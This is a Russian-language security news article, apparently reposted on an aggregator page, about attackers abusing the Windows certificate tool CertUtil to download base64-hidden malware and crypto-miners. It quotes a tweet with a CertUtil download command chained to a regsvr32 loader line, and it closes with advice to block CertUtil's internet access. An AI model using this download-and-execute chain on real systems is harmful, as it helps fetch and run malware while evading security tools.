html текст
All interests
  • All interests
  • Design
  • Food
  • Gadgets
  • Humor
  • News
  • Photo
  • Travel
  • Video
Click to see the next recommended page
Like it
Don't like
Add to Favorites

Легитимный Windows-инструмент CertUtil используется для установки малвари

ИБ-специалисты сразу нескольких фирм обнаружили интересную тенденцию в киберкриминальной среде. Встроенное в Windows решение для работы с сертификатами, CertUtil, используется для установки малвари.

В нормальных обстоятельствах Certutil.exe применяется для установки, удаления, бэкапа и выполнения других функций, связанных с работой сертификатов (в том числе, хранящихся в Windows). Так, одной из возможностей этого инструмента является загрузка сертификатов или любых других файлов с удаленного URL-адреса, для последующего сохранения в виде локального файла: certutil.exe -urlcache -split -f [URL] output.file. И еще в 2017 году специалисты по информационной безопасности выражали опасение, что эта функция может быть использована для загрузки малвари.

certutil -urlcache -split -f [serverURL] file.blah
regsvr32.exe /s /u /I:file.blah scrub.dll
Makes a nice pairing.

— Casey Smith (@subTee) July 20, 2017

Дело в том, что в некоторых случаях преступникам будет удобнее использовать легитимную CertUtil для загрузки, так как зараженный компьютер может быть защищен, и неизвестным приложениям может быть запрещена загрузка чего бы то ни было. В таких ситуациях встроенное в Windows решение оказывается очень кстати.

Издание Bleeping Computer сообщает, что в последнее время на злоупотребление Certutil обратили внимание сразу несколько ИБ-специалистов. Так, Ксавье Мертенс (Xavier Mertens) опубликовал заметку, посвященную эксплуатации CertUtil злоумышленниками. Эксперт рассказывает, что атакующие не просто загружают малварь на зараженные машины, используя легитимный инструмент, но и маскируют свою полезную нагрузку с помощью base64, так что файл кажется защитным решениям безобидным текстом. Уже после загрузки файла, злоумышленники обращаются к команде certutil.exe -decode и преобразуют угрозу обратно в исполняемый файл. Такой метод позволяет хакерам оставаться незамеченными как можно дольше.

Также о злоупотреблении CertUtil пишут специалисты F5 Labs и «Лаборатории Касперского». Аналитики F5 Labs рассказали, что недавно ими была обнаружена кампания, в которой злоумышленники используют CertUtil.exe для атак на Windows-системы и устанавливают на них майнер криптовалюты Electroneum. В свою очередь, эксперт «Лаборатории Касперского» Фабио Ассолини (Fabio Assolini) сообщает, что данный метод уже довольно давно взяли на вооружение бразильские злоумышленники.

Brazilian coders are already abusing this tool for some time, using to install more malware…

— Fabio Assolini (@assolini) April 4, 2018

Так как эксплуатация CertUtil, по всей видимости, становится все популярнее, специалисты советуют запретить CertUtil связываться с интернетом. Конечно, если CertUtil не используется для доступа к сертификатам на удаленных серверах.

Читать дальше
Twitter
Одноклассники
Мой Мир

материал с xakep.ru

2

      Add

      You can create thematic collections and keep, for instance, all recipes in one place so you will never lose them.

      No images found
      Previous Next 0 / 0
      500
      • Advertisement
      • Animals
      • Architecture
      • Art
      • Auto
      • Aviation
      • Books
      • Cartoons
      • Celebrities
      • Children
      • Culture
      • Design
      • Economics
      • Education
      • Entertainment
      • Fashion
      • Fitness
      • Food
      • Gadgets
      • Games
      • Health
      • History
      • Hobby
      • Humor
      • Interior
      • Moto
      • Movies
      • Music
      • Nature
      • News
      • Photo
      • Pictures
      • Politics
      • Psychology
      • Science
      • Society
      • Sport
      • Technology
      • Travel
      • Video
      • Weapons
      • Web
      • Work
        Submit
        Valid formats are JPG, PNG, GIF.
        Not more than 5 Мb, please.
        30
        surfingbird.ru/site/
        RSS format guidelines
        500
        • Advertisement
        • Animals
        • Architecture
        • Art
        • Auto
        • Aviation
        • Books
        • Cartoons
        • Celebrities
        • Children
        • Culture
        • Design
        • Economics
        • Education
        • Entertainment
        • Fashion
        • Fitness
        • Food
        • Gadgets
        • Games
        • Health
        • History
        • Hobby
        • Humor
        • Interior
        • Moto
        • Movies
        • Music
        • Nature
        • News
        • Photo
        • Pictures
        • Politics
        • Psychology
        • Science
        • Society
        • Sport
        • Technology
        • Travel
        • Video
        • Weapons
        • Web
        • Work

          Submit

          Thank you! Wait for moderation.

          Тебе это не нравится?

          You can block the domain, tag, user or channel, and we'll stop recommend it to you. You can always unblock them in your settings.

          • XakepVideo
          • домен xakep.ru

          Get a link

          Спасибо, твоя жалоба принята.

          Log on to Surfingbird

          Recover
          Sign up

          or

          Welcome to Surfingbird.com!

          You'll find thousands of interesting pages, photos, and videos inside.
          Join!

          • Personal
            recommendations

          • Stash
            interesting and useful stuff

          • Anywhere,
            anytime

          Do we already know you? Login or restore the password.

          Close

          Add to collection

             

            Facebook

            Ваш профиль на рассмотрении, обновите страницу через несколько секунд

            Facebook

            К сожалению, вы не попадаете под условия акции